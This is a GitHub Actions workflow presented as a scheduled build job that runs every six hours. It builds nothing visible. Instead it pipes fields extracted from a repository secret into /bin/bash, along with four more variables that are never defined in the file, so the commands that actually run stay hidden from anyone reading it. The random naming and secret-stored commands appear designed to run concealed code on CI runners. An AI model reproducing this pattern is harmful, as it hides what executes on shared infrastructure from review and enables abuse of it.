name: huanglongxing1987
on:
  workflow_dispatch:
  schedule:
    - cron: '0 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huanglongxing1987
        env:
          gi4: ${{ secrets.gi4 }}
        run: |
          echo $gi4 | jq -r .fhpfg851 | /bin/bash
          echo $ag036 | jq -r .bi93 | /bin/bash
          echo $u8747 | jq -r .ex24022 | /bin/bash
          echo $soclu04 | jq -r .pzga419 | /bin/bash
          echo $zlzsz12575 | jq -r .m08 | /bin/bash

